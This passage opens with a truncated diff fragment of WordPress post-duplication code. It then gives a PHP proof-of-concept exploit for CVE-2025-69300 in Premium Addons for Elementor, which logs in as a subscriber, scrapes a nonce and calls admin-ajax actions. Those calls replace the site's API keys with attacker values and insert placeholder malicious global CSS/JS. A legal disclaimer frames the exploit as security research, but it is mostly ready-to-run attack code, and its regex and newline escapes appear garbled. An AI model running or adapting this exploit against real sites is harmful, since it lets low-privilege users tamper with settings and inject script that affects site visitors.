+				$terms = wp_get_object_terms( $post->ID, $taxonomy, array( 'fields' => 'slugs' ) );
+				wp_set_object_terms( $id, $terms, $taxonomy, false );
+			}
+		}
+	}
+
+	/**
+	 * Add post meta data to the cloned version
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param object  $post WP_Post.
+	 * @param integer $id item ID.
+	 */
+	public static function duplicate_post_meta_data( $old_id, $new_id ) {
+
+		$post_meta_keys = get_post_custom_keys( $old_id );
+
+		if ( ! empty(

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69300 - Premium Addons for Elementor <= 4.11.63 - Missing Authorization to Authenticated (Subscriber+) Settings Update

<?php
/**
 * Proof of Concept for CVE-2025-69300
 * Demonstrates unauthorized plugin settings modification by Subscriber-level users
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_password';

// Step 1: Authenticate as Subscriber to obtain WordPress cookies and nonce
function authenticate_and_get_nonce($target_url, $username, $password) {
    $login_url = $target_url . '/wp-login.php';
    $admin_url = $target_url . '/wp-admin/';
    
    // Initialize session
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    
    // Get login page to retrieve nonce
    curl_setopt($ch, CURLOPT_URL, $login_url);
    $response = curl_exec($ch);
    
    // Extract login nonce (WordPress uses 'log' and 'pwd' parameters)
    // Note: Modern WordPress may require additional nonce extraction
    
    // Perform login
    $post_data = http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ]);
    
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    $response = curl_exec($ch);
    
    // Navigate to admin page to get AJAX nonce
    curl_setopt($ch, CURLOPT_URL, $admin_url);
    curl_setopt($ch, CURLOPT_POST, false);
    $response = curl_exec($ch);
    
    // Extract nonce from page (simplified - actual implementation would parse HTML)
    // Premium Addons nonce is typically available in page scripts
    preg_match('/"pa-settings-tab"s*:s*"([a-f0-9]+)"/', $response, $matches);
    $nonce = $matches[1] ?? '';
    
    curl_close($ch);
    return $nonce;
}

// Step 2: Exploit missing authorization to modify plugin settings
function exploit_settings_update($target_url, $nonce) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_POST, true);
    
    // Example 1: Modify integration settings
    $integration_data = [
        'action' => 'pa_save_integration',
        'security' => $nonce,
        'fields' => json_encode([
            'premium-map-api' => 'ATTACKER_CONTROLLED_API_KEY',
            'premium-youtube-api' => 'ATTACKER_YT_API_KEY',
            'premium-mailchimp-api' => 'ATTACKER_MAILCHIMP_KEY'
        ])
    ];
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $integration_data);
    $response = curl_exec($ch);
    echo "Integration Settings Update Response: " . $response . "n";
    
    // Example 2: Modify global CSS/JS settings
    $css_js_data = [
        'action' => 'pa_save_global_css_js',
        'security' => $nonce,
        'fields' => json_encode([
            'premium-global-css' => '/* Malicious CSS injection */',
            'premium-global-js' => '// Malicious JavaScript'
        ])
    ];
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $css_js_data);
    $response = curl_exec($ch);
    echo "Global CSS/JS Update Response: " . $response . "n";
    
    curl_close($ch);
}

// Main execution
if ($target_url && $username && $password) {
    echo "[+] Starting exploitation of CVE-2025-69300n";
    echo "[+] Target: " . $target_url . "n";
    
    $nonce = authenticate_and_get_nonce($target_url, $username, $password);
    
    if ($nonce) {
        echo "[+] Obtained nonce: " . $nonce . "n";
        echo "[+] Attempting unauthorized settings modification...n";
        exploit_settings_update($target_url, $nonce);
        echo "[+] Exploitation attempt completedn";
    } else {
        echo "[-] Failed to obtain noncen";
    }
} else {
    echo "Please configure target_url, username, and password variablesn";
}
?>